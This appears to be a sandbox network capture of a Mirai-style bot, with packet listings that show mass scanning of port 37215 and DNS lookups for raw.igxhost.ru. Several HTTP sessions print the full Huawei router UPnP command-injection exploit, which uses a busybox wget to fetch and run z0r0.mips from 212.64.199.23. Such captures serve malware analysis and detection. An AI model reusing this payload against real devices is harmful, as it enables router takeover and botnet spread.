                                                          Feb 4, 2025 18:11:25.624046087 CET3721535000197.34.184.215192.168.2.15
                                                          Feb 4, 2025 18:11:25.624047995 CET5590837215192.168.2.15156.166.178.3
                                                          Feb 4, 2025 18:11:25.624052048 CET3721553192156.79.255.142192.168.2.15
                                                          Feb 4, 2025 18:11:25.624056101 CET1064037215192.168.2.1541.28.7.187
                                                          Feb 4, 2025 18:11:25.624058962 CET372154085441.204.54.254192.168.2.15
                                                          Feb 4, 2025 18:11:25.624068022 CET1064037215192.168.2.15156.51.228.214
                                                          Feb 4, 2025 18:11:25.624068022 CET1064037215192.168.2.15197.140.151.129
                                                          Feb 4, 2025 18:11:25.624068975 CET3721557432156.60.115.244192.168.2.15
                                                          Feb 4, 2025 18:11:25.624070883 CET1064037215192.168.2.1541.227.108.81
                                                          Feb 4, 2025 18:11:25.624070883 CET1064037215192.168.2.15156.246.225.38
                                                          Feb 4, 2025 18:11:25.624083042 CET1064037215192.168.2.1541.120.96.211
                                                          Feb 4, 2025 18:11:25.624087095 CET1064037215192.168.2.15156.182.235.157
                                                          Feb 4, 2025 18:11:25.624087095 CET1064037215192.168.2.1541.174.162.150
                                                          Feb 4, 2025 18:11:25.624092102 CET1064037215192.168.2.15197.145.133.213
                                                          Feb 4, 2025 18:11:25.624092102 CET1064037215192.168.2.15156.242.156.33
                                                          Feb 4, 2025 18:11:25.624094963 CET1064037215192.168.2.1541.98.45.223
                                                          Feb 4, 2025 18:11:25.624095917 CET3721557946197.234.52.32192.168.2.15
                                                          Feb 4, 2025 18:11:25.624102116 CET1064037215192.168.2.15156.11.101.228
                                                          Feb 4, 2025 18:11:25.624102116 CET1064037215192.168.2.1541.13.201.6
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.15156.113.150.12
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.15197.36.190.160
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.15156.54.150.133
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.15197.35.168.168
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.15197.240.250.3
                                                          Feb 4, 2025 18:11:25.624109030 CET1064037215192.168.2.1541.215.202.67
                                                          Feb 4, 2025 18:11:25.624116898 CET1064037215192.168.2.15156.215.191.80
                                                          Feb 4, 2025 18:11:25.624119997 CET1064037215192.168.2.15156.73.163.22
                                                          Feb 4, 2025 18:11:25.624124050 CET1064037215192.168.2.15156.79.158.233
                                                          Feb 4, 2025 18:11:25.624130964 CET1064037215192.168.2.1541.206.214.91
                                                          Feb 4, 2025 18:11:25.624142885 CET1064037215192.168.2.15197.13.147.214
                                                          Feb 4, 2025 18:11:25.624146938 CET1064037215192.168.2.15156.225.84.164
                                                          Feb 4, 2025 18:11:25.624150991 CET1064037215192.168.2.15197.127.17.92
                                                          Feb 4, 2025 18:11:25.624206066 CET5334637215192.168.2.15197.58.88.197
                                                          Feb 4, 2025 18:11:25.624206066 CET4701680192.168.2.15161.225.186.189
                                                          Feb 4, 2025 18:11:25.624207020 CET4085437215192.168.2.1541.204.54.254
                                                          Feb 4, 2025 18:11:25.624207973 CET3500037215192.168.2.15197.34.184.215
                                                          Feb 4, 2025 18:11:25.624207020 CET5743237215192.168.2.15156.60.115.244
                                                          Feb 4, 2025 18:11:25.624207973 CET5999237215192.168.2.15197.243.83.152
                                                          Feb 4, 2025 18:11:25.624207020 CET5794637215192.168.2.15197.234.52.32
                                                          Feb 4, 2025 18:11:25.624207973 CET5319237215192.168.2.15156.79.255.142
                                                          Feb 4, 2025 18:11:25.624207020 CET1064037215192.168.2.1541.170.18.25
                                                          Feb 4, 2025 18:11:25.624214888 CET1064037215192.168.2.15197.34.242.47
                                                          Feb 4, 2025 18:11:25.624214888 CET1064037215192.168.2.1541.187.114.35
                                                          Feb 4, 2025 18:11:25.624217033 CET1064037215192.168.2.15156.192.89.222
                                                          Feb 4, 2025 18:11:25.624217033 CET1064037215192.168.2.15156.169.42.94
                                                          Feb 4, 2025 18:11:25.624222994 CET1064037215192.168.2.15156.97.139.237
                                                          Feb 4, 2025 18:11:25.624233007 CET1064037215192.168.2.15156.183.251.212
                                                          Feb 4, 2025 18:11:25.624234915 CET1064037215192.168.2.1541.75.169.182
                                                          Feb 4, 2025 18:11:25.624234915 CET1064037215192.168.2.15156.245.16.229
                                                          Feb 4, 2025 18:11:25.624237061 CET1064037215192.168.2.15197.51.12.73
                                                          Feb 4, 2025 18:11:25.624245882 CET1064037215192.168.2.15156.27.186.136
                                                          Feb 4, 2025 18:11:25.624247074 CET1064037215192.168.2.1541.128.133.9
                                                          Feb 4, 2025 18:11:25.624245882 CET1064037215192.168.2.1541.158.119.105
                                                          Feb 4, 2025 18:11:25.624247074 CET1064037215192.168.2.1541.57.38.250
                                                          Feb 4, 2025 18:11:25.624248981 CET1064037215192.168.2.15197.21.19.60
                                                          Feb 4, 2025 18:11:25.624248981 CET1064037215192.168.2.15156.72.47.121
                                                          Feb 4, 2025 18:11:25.624257088 CET1064037215192.168.2.1541.191.14.235
                                                          Feb 4, 2025 18:11:25.624257088 CET1064037215192.168.2.15197.35.29.190
                                                          Feb 4, 2025 18:11:25.624258995 CET1064037215192.168.2.15197.128.5.99
                                                          Feb 4, 2025 18:11:25.624260902 CET1064037215192.168.2.1541.43.71.136
                                                          Feb 4, 2025 18:11:25.624260902 CET1064037215192.168.2.1541.254.196.115
                                                          Feb 4, 2025 18:11:25.624260902 CET1064037215192.168.2.1541.65.90.241
                                                          Feb 4, 2025 18:11:25.624267101 CET1064037215192.168.2.15197.246.174.231
                                                          Feb 4, 2025 18:11:25.624267101 CET1064037215192.168.2.15197.18.207.184
                                                          Feb 4, 2025 18:11:25.624268055 CET1064037215192.168.2.1541.136.134.44
                                                          Feb 4, 2025 18:11:25.624267101 CET1064037215192.168.2.1541.120.14.233
                                                          Feb 4, 2025 18:11:25.624267101 CET1064037215192.168.2.1541.127.5.230
                                                          Feb 4, 2025 18:11:25.624269009 CET1064037215192.168.2.15197.91.101.174
                                                          Feb 4, 2025 18:11:25.624269009 CET1064037215192.168.2.15156.237.152.119
                                                          Feb 4, 2025 18:11:25.624269009 CET1064037215192.168.2.1541.138.123.168
                                                          Feb 4, 2025 18:11:25.624269962 CET1064037215192.168.2.15197.57.155.120
                                                          Feb 4, 2025 18:11:25.624273062 CET1064037215192.168.2.15156.3.241.1
                                                          Feb 4, 2025 18:11:25.624277115 CET1064037215192.168.2.15197.100.9.208
                                                          Feb 4, 2025 18:11:25.624284983 CET1064037215192.168.2.15197.78.118.119
                                                          Feb 4, 2025 18:11:25.624289989 CET1064037215192.168.2.15197.173.224.107
                                                          Feb 4, 2025 18:11:25.624293089 CET1064037215192.168.2.15197.155.96.233
                                                          Feb 4, 2025 18:11:25.624300003 CET1064037215192.168.2.15156.29.46.90
                                                          Feb 4, 2025 18:11:25.624301910 CET1064037215192.168.2.15156.54.220.152
                                                          Feb 4, 2025 18:11:25.624315023 CET1064037215192.168.2.1541.93.124.222
                                                          Feb 4, 2025 18:11:25.624315023 CET1064037215192.168.2.15156.87.44.131
                                                          Feb 4, 2025 18:11:25.624315977 CET1064037215192.168.2.15156.22.34.234
                                                          Feb 4, 2025 18:11:25.624330997 CET1064037215192.168.2.15156.119.33.244
                                                          Feb 4, 2025 18:11:25.624334097 CET1064037215192.168.2.1541.247.8.128
                                                          Feb 4, 2025 18:11:25.624345064 CET1064037215192.168.2.15156.219.176.33
                                                          Feb 4, 2025 18:11:25.624345064 CET1064037215192.168.2.15197.226.49.71
                                                          Feb 4, 2025 18:11:25.624349117 CET1064037215192.168.2.1541.138.178.188
                                                          Feb 4, 2025 18:11:25.624373913 CET1064037215192.168.2.15156.113.11.188
                                                          Feb 4, 2025 18:11:25.624404907 CET1064037215192.168.2.15197.107.249.210
                                                          Feb 4, 2025 18:11:25.624404907 CET1064037215192.168.2.1541.208.245.137
                                                          Feb 4, 2025 18:11:25.624406099 CET1064037215192.168.2.1541.222.7.228
                                                          Feb 4, 2025 18:11:25.624407053 CET1064037215192.168.2.15156.189.85.43
                                                          Feb 4, 2025 18:11:25.624424934 CET1064037215192.168.2.15156.134.4.95
                                                          Feb 4, 2025 18:11:25.624424934 CET1064037215192.168.2.1541.80.25.73
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.1541.224.70.217
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.15197.209.73.254
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.1541.254.241.27
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.15197.211.112.138
                                                          Feb 4, 2025 18:11:25.624428988 CET1064037215192.168.2.15197.248.54.164
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.15197.131.9.97
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.1541.243.208.89
                                                          Feb 4, 2025 18:11:25.624429941 CET1064037215192.168.2.15197.144.127.115
                                                          Feb 4, 2025 18:11:25.624429941 CET1064037215192.168.2.15197.252.173.201
                                                          Feb 4, 2025 18:11:25.624440908 CET1064037215192.168.2.1541.162.165.148
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.1541.170.85.13
                                                          Feb 4, 2025 18:11:25.624445915 CET1064037215192.168.2.15156.185.129.124
                                                          Feb 4, 2025 18:11:25.624427080 CET1064037215192.168.2.15156.205.239.56
                                                          Feb 4, 2025 18:11:25.624445915 CET1064037215192.168.2.15156.24.191.79
                                                          Feb 4, 2025 18:11:25.624448061 CET1064037215192.168.2.15197.146.147.67
                                                          Feb 4, 2025 18:11:25.624447107 CET1064037215192.168.2.1541.91.9.201
                                                          Feb 4, 2025 18:11:25.624449968 CET1064037215192.168.2.15156.182.222.153
                                                          Feb 4, 2025 18:11:25.624447107 CET1064037215192.168.2.15197.133.233.236
                                                          Feb 4, 2025 18:11:25.624450922 CET1064037215192.168.2.1541.191.97.89
                                                          Feb 4, 2025 18:11:25.624450922 CET1064037215192.168.2.1541.154.185.208
                                                          Feb 4, 2025 18:11:25.624452114 CET1064037215192.168.2.1541.7.220.84
                                                          Feb 4, 2025 18:11:25.624456882 CET1064037215192.168.2.15156.218.143.191
                                                          Feb 4, 2025 18:11:25.624456882 CET1064037215192.168.2.15197.127.215.193
                                                          Feb 4, 2025 18:11:25.624459982 CET1064037215192.168.2.15156.22.213.37
                                                          Feb 4, 2025 18:11:25.624459982 CET1064037215192.168.2.15197.214.97.82
                                                          Feb 4, 2025 18:11:25.624459982 CET1064037215192.168.2.15197.129.226.77
                                                          Feb 4, 2025 18:11:25.624464035 CET1064037215192.168.2.15156.191.141.43
                                                          Feb 4, 2025 18:11:25.624464035 CET1064037215192.168.2.15156.231.172.124
                                                          Feb 4, 2025 18:11:25.624464989 CET1064037215192.168.2.15156.109.179.171
                                                          Feb 4, 2025 18:11:25.624464989 CET1064037215192.168.2.1541.169.43.64
                                                          Feb 4, 2025 18:11:25.624466896 CET1064037215192.168.2.15156.192.184.154
                                                          Feb 4, 2025 18:11:25.624469995 CET1064037215192.168.2.1541.76.61.226
                                                          Feb 4, 2025 18:11:25.624469995 CET1064037215192.168.2.15156.139.98.146
                                                          Feb 4, 2025 18:11:25.624475002 CET1064037215192.168.2.15197.236.124.83
                                                          Feb 4, 2025 18:11:25.624480009 CET1064037215192.168.2.15156.233.5.191
                                                          Feb 4, 2025 18:11:25.624481916 CET1064037215192.168.2.15156.231.205.148
                                                          Feb 4, 2025 18:11:25.624485970 CET1064037215192.168.2.1541.177.126.116
                                                          Feb 4, 2025 18:11:25.624486923 CET1064037215192.168.2.15197.239.26.208
                                                          Feb 4, 2025 18:11:25.624488115 CET1064037215192.168.2.15156.131.102.83
                                                          Feb 4, 2025 18:11:25.624504089 CET1064037215192.168.2.15156.182.103.125
                                                          Feb 4, 2025 18:11:25.624505043 CET1064037215192.168.2.15197.34.139.97
                                                          Feb 4, 2025 18:11:25.624505997 CET1064037215192.168.2.15156.227.163.64
                                                          Feb 4, 2025 18:11:25.624505997 CET1064037215192.168.2.15156.182.22.224
                                                          Feb 4, 2025 18:11:25.624506950 CET1064037215192.168.2.15197.254.127.79
                                                          Feb 4, 2025 18:11:25.624505997 CET1064037215192.168.2.15197.230.107.224
                                                          Feb 4, 2025 18:11:25.624507904 CET1064037215192.168.2.1541.31.12.137
                                                          Feb 4, 2025 18:11:25.624506950 CET1064037215192.168.2.15197.53.161.49
                                                          Feb 4, 2025 18:11:25.624519110 CET1064037215192.168.2.1541.171.107.255
                                                          Feb 4, 2025 18:11:25.624519110 CET1064037215192.168.2.1541.103.148.243
                                                          Feb 4, 2025 18:11:25.624519110 CET1064037215192.168.2.1541.120.110.72
                                                          Feb 4, 2025 18:11:25.624521971 CET1064037215192.168.2.15197.176.95.56
                                                          Feb 4, 2025 18:11:25.624522924 CET1064037215192.168.2.15197.123.126.91
                                                          Feb 4, 2025 18:11:25.624521971 CET1064037215192.168.2.15197.24.171.188
                                                          Feb 4, 2025 18:11:25.624522924 CET1064037215192.168.2.15156.188.19.22
                                                          Feb 4, 2025 18:11:25.624528885 CET1064037215192.168.2.15156.80.227.103
                                                          Feb 4, 2025 18:11:25.624528885 CET1064037215192.168.2.15156.143.73.16
                                                          Feb 4, 2025 18:11:25.624531031 CET1064037215192.168.2.1541.239.54.108
                                                          Feb 4, 2025 18:11:25.624531031 CET1064037215192.168.2.15197.73.238.170
                                                          Feb 4, 2025 18:11:25.624531031 CET1064037215192.168.2.15156.168.52.78
                                                          Feb 4, 2025 18:11:25.624541998 CET1064037215192.168.2.15197.214.178.38
                                                          Feb 4, 2025 18:11:25.624543905 CET1064037215192.168.2.15197.43.15.160
                                                          Feb 4, 2025 18:11:25.624543905 CET1064037215192.168.2.15197.90.128.130
                                                          Feb 4, 2025 18:11:25.624546051 CET1064037215192.168.2.15156.63.176.193
                                                          Feb 4, 2025 18:11:25.624546051 CET1064037215192.168.2.15197.194.234.237
                                                          Feb 4, 2025 18:11:25.624557972 CET1064037215192.168.2.15156.252.16.178
                                                          Feb 4, 2025 18:11:25.624557972 CET1064037215192.168.2.15197.60.105.34
                                                          Feb 4, 2025 18:11:25.624558926 CET1064037215192.168.2.1541.82.162.228
                                                          Feb 4, 2025 18:11:25.624560118 CET1064037215192.168.2.1541.249.24.173
                                                          Feb 4, 2025 18:11:25.624561071 CET1064037215192.168.2.15156.153.24.104
                                                          Feb 4, 2025 18:11:25.624561071 CET1064037215192.168.2.1541.40.205.123
                                                          Feb 4, 2025 18:11:25.624561071 CET1064037215192.168.2.15156.68.218.234
                                                          Feb 4, 2025 18:11:25.624561071 CET1064037215192.168.2.1541.71.192.18
                                                          Feb 4, 2025 18:11:25.624567032 CET1064037215192.168.2.15197.73.66.155
                                                          Feb 4, 2025 18:11:25.624567986 CET1064037215192.168.2.15197.212.174.140
                                                          Feb 4, 2025 18:11:25.624569893 CET1064037215192.168.2.1541.111.211.253
                                                          Feb 4, 2025 18:11:25.624569893 CET1064037215192.168.2.15156.143.242.181
                                                          Feb 4, 2025 18:11:25.624569893 CET1064037215192.168.2.1541.20.218.226
                                                          Feb 4, 2025 18:11:25.624569893 CET1064037215192.168.2.15156.88.117.74
                                                          Feb 4, 2025 18:11:25.624573946 CET1064037215192.168.2.15197.207.159.161
                                                          Feb 4, 2025 18:11:25.624583960 CET1064037215192.168.2.15156.158.149.16
                                                          Feb 4, 2025 18:11:25.624589920 CET1064037215192.168.2.15156.157.111.102
                                                          Feb 4, 2025 18:11:25.624591112 CET1064037215192.168.2.1541.0.115.76
                                                          Feb 4, 2025 18:11:25.624594927 CET1064037215192.168.2.15156.44.227.24
                                                          Feb 4, 2025 18:11:25.624608040 CET1064037215192.168.2.1541.44.74.143
                                                          Feb 4, 2025 18:11:25.624612093 CET1064037215192.168.2.15197.119.220.137
                                                          Feb 4, 2025 18:11:25.624629974 CET1064037215192.168.2.15156.172.106.51
                                                          Feb 4, 2025 18:11:25.624629974 CET1064037215192.168.2.1541.107.245.113
                                                          Feb 4, 2025 18:11:25.624622107 CET1064037215192.168.2.15156.170.87.73
                                                          Feb 4, 2025 18:11:25.624622107 CET1064037215192.168.2.15197.94.112.83
                                                          Feb 4, 2025 18:11:25.624648094 CET1064037215192.168.2.15156.9.107.0
                                                          Feb 4, 2025 18:11:25.624655008 CET1064037215192.168.2.1541.188.207.233
                                                          Feb 4, 2025 18:11:25.624655008 CET1064037215192.168.2.1541.195.91.221
                                                          Feb 4, 2025 18:11:25.624655008 CET1064037215192.168.2.15156.18.243.56
                                                          Feb 4, 2025 18:11:25.624655962 CET1064037215192.168.2.1541.30.167.253
                                                          Feb 4, 2025 18:11:25.624655962 CET1064037215192.168.2.15197.201.92.142
                                                          Feb 4, 2025 18:11:25.624670029 CET1064037215192.168.2.15197.1.99.115
                                                          Feb 4, 2025 18:11:25.624672890 CET1064037215192.168.2.1541.10.187.28
                                                          Feb 4, 2025 18:11:25.624672890 CET1064037215192.168.2.15156.7.98.26
                                                          Feb 4, 2025 18:11:25.624682903 CET1064037215192.168.2.1541.46.116.104
                                                          Feb 4, 2025 18:11:25.624691963 CET1064037215192.168.2.1541.70.151.172
                                                          Feb 4, 2025 18:11:25.624702930 CET1064037215192.168.2.15197.57.13.244
                                                          Feb 4, 2025 18:11:25.624707937 CET1064037215192.168.2.15197.133.219.124
                                                          Feb 4, 2025 18:11:25.624708891 CET1064037215192.168.2.15197.176.26.210
                                                          Feb 4, 2025 18:11:25.624713898 CET1064037215192.168.2.15197.197.146.92
                                                          Feb 4, 2025 18:11:25.624730110 CET1064037215192.168.2.1541.72.62.11
                                                          Feb 4, 2025 18:11:25.624736071 CET1064037215192.168.2.15197.251.222.7
                                                          Feb 4, 2025 18:11:25.624739885 CET1064037215192.168.2.15197.211.72.80
                                                          Feb 4, 2025 18:11:25.624749899 CET1064037215192.168.2.15156.210.180.12
                                                          Feb 4, 2025 18:11:25.624753952 CET1064037215192.168.2.1541.156.222.38
                                                          Feb 4, 2025 18:11:25.624753952 CET1064037215192.168.2.15197.61.100.74
                                                          Feb 4, 2025 18:11:25.624756098 CET1064037215192.168.2.15156.46.166.71
                                                          Feb 4, 2025 18:11:25.624773026 CET1064037215192.168.2.15197.203.75.23
                                                          Feb 4, 2025 18:11:25.624773026 CET1064037215192.168.2.15197.234.127.173
                                                          Feb 4, 2025 18:11:25.624774933 CET1064037215192.168.2.15197.177.142.236
                                                          Feb 4, 2025 18:11:25.624787092 CET1064037215192.168.2.15197.36.64.228
                                                          Feb 4, 2025 18:11:25.624787092 CET1064037215192.168.2.1541.202.167.72
                                                          Feb 4, 2025 18:11:25.624799967 CET1064037215192.168.2.15156.105.28.40
                                                          Feb 4, 2025 18:11:25.624811888 CET1064037215192.168.2.15156.125.232.159
                                                          Feb 4, 2025 18:11:25.624815941 CET1064037215192.168.2.1541.192.78.97
                                                          Feb 4, 2025 18:11:25.624819994 CET1064037215192.168.2.1541.175.199.42
                                                          Feb 4, 2025 18:11:25.624821901 CET1064037215192.168.2.15197.159.77.144
                                                          Feb 4, 2025 18:11:25.624821901 CET1064037215192.168.2.15197.141.175.48
                                                          Feb 4, 2025 18:11:25.624825954 CET1064037215192.168.2.15197.214.22.40
                                                          Feb 4, 2025 18:11:25.624838114 CET1064037215192.168.2.15197.227.207.100
                                                          Feb 4, 2025 18:11:25.624841928 CET1064037215192.168.2.15156.118.60.193
                                                          Feb 4, 2025 18:11:25.624855042 CET1064037215192.168.2.1541.158.52.97
                                                          Feb 4, 2025 18:11:25.624855042 CET1064037215192.168.2.1541.192.226.149
                                                          Feb 4, 2025 18:11:25.624855042 CET1064037215192.168.2.15156.149.109.235
                                                          Feb 4, 2025 18:11:25.624859095 CET1064037215192.168.2.15156.127.242.121
                                                          Feb 4, 2025 18:11:25.624866009 CET1064037215192.168.2.15197.1.130.227
                                                          Feb 4, 2025 18:11:25.624875069 CET1064037215192.168.2.1541.118.32.20
                                                          Feb 4, 2025 18:11:25.624878883 CET1064037215192.168.2.15197.129.228.123
                                                          Feb 4, 2025 18:11:25.624897003 CET1064037215192.168.2.15156.46.216.135
                                                          Feb 4, 2025 18:11:25.624897957 CET1064037215192.168.2.15197.181.222.193
                                                          Feb 4, 2025 18:11:25.624901056 CET1064037215192.168.2.15197.222.232.178
                                                          Feb 4, 2025 18:11:25.624902964 CET1064037215192.168.2.15197.203.91.3
                                                          Feb 4, 2025 18:11:25.624912024 CET1064037215192.168.2.15156.33.178.34
                                                          Feb 4, 2025 18:11:25.624917984 CET1064037215192.168.2.1541.210.183.0
                                                          Feb 4, 2025 18:11:25.624917984 CET1064037215192.168.2.15197.254.143.101
                                                          Feb 4, 2025 18:11:25.624921083 CET1064037215192.168.2.15156.72.3.107
                                                          Feb 4, 2025 18:11:25.624924898 CET1064037215192.168.2.15197.198.222.27
                                                          Feb 4, 2025 18:11:25.624933958 CET1064037215192.168.2.1541.119.169.204
                                                          Feb 4, 2025 18:11:25.624942064 CET1064037215192.168.2.1541.224.244.212
                                                          Feb 4, 2025 18:11:25.624950886 CET1064037215192.168.2.1541.56.205.139
                                                          Feb 4, 2025 18:11:25.624953985 CET1064037215192.168.2.15197.89.241.208
                                                          Feb 4, 2025 18:11:25.624965906 CET1064037215192.168.2.15197.13.3.178
                                                          Feb 4, 2025 18:11:25.624970913 CET1064037215192.168.2.1541.181.132.25
                                                          Feb 4, 2025 18:11:25.624983072 CET1064037215192.168.2.15197.47.87.222
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Feb 4, 2025 18:11:15.320871115 CET192.168.2.158.8.8.80x4f48Standard query (0)raw.igxhost.ruA (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:16.097337008 CET192.168.2.158.8.8.80x800cStandard query (0)raw.igxhost.ruA (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:16.814217091 CET192.168.2.158.8.8.80x7bd9Standard query (0)raw.igxhost.ruA (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:21.913667917 CET192.168.2.158.8.8.80x7bd9Standard query (0)raw.igxhost.ruA (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:23.679763079 CET192.168.2.158.8.8.80x922bStandard query (0)raw.igxhost.ruA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Feb 4, 2025 18:11:15.333736897 CET8.8.8.8192.168.2.150x4f48No error (0)raw.igxhost.ru212.64.199.23A (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:16.107503891 CET8.8.8.8192.168.2.150x800cNo error (0)raw.igxhost.ru212.64.199.23A (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:21.923300982 CET8.8.8.8192.168.2.150x7bd9No error (0)raw.igxhost.ru212.64.199.23A (IP address)IN (0x0001)false
                                                          Feb 4, 2025 18:11:23.690887928 CET8.8.8.8192.168.2.150x922bNo error (0)raw.igxhost.ru212.64.199.23A (IP address)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          0192.168.2.1556422197.186.125.4937215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.734272957 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192.168.2.155309441.229.92.7237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.737339020 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192.168.2.1547592156.232.252.3037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:16.745208979 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
